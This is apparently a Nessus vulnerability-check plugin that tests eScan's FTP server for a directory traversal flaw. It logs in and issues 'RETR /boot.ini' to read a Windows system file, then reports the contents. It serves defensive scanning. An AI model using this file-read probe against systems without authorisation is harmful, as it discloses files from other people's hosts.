#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31357);
  script_version("$Revision: 1.2 $");

  script_bugtraq_id(28127);
  script_xref(name:"Secunia", value:"29246");

  script_name(english:"eScan FTP Server Directory Traversal Vulnerability");
  script_summary(english:"Tries to retrieve a local file");

  desc = "
Synopsis :

The remote ftp server is affected by a directory traversal
vulnerability. 

Description :

The version of eScan Management Console / eScan Server installed
on the remote host includes an FTP server that is affected by a
directory traversal vulnerability.  By leveraging this issue,
an unauthenticated remote attacker can retrieve files on the same
drive as the application.

See also :

http://aluigi.altervista.org/adv/escaz-adv.txt
http://archives.neohapsis.com/archives/fulldisclosure/2008-03/0108.html

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"FTP");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("ftpserver_detect_type_nd_version.nasl");
  script_require_keys("ftp/login", "ftp/password");
  script_require_ports("Services/ftp", 2021);

  exit(0);
}


include("ftp_func.inc");
include("global_settings.inc");


port = get_kb_item("Services/ftp");
if (!port) port = 2021;


# Make sure the banner looks like eScan.
banner = get_ftp_banner(port:port);
if (!banner || "Microworld Systems FTP server" >!< banner) exit(0);


# nb: to exploit the vulnerability we need to log in.
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if (!user) exit(0);


soc = open_sock_tcp(port);
if (!soc) exit(0);

if (!ftp_authenticate(socket:soc, user:user, pass:pass))
{
  if (log_verbosity > 1) debug_print("can't login with supplied ftp credentials; skipped!", level:0);
  close(soc);
  exit(1);
}


# Try to exploit the issue to get a local file.
file = "boot.ini";
port2 = ftp_pasv(socket:soc);
if (!port2) exit(0);
soc2 = open_sock_tcp(port2, transport:ENCAPS_IP);
if (!soc2) exit(0);

c = string("RETR /", file);
send(socket:soc, data:string(c, "\r\n"));
s = ftp_recv_line(socket:soc);
if (s =~ "^(425|150) ")
{
  contents = ftp_recv_data(socket:soc2);
  close(soc2);

  # There's a problem if it looks like a boot.ini.
  if ("[boot loader]" >< contents)
  {
    if (report_verbosity)
    {
      report = string(
        "\n",
        "Here are the contents of the file '", file, "' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    exit(0);
  }
}
ftp_close(socket:soc);
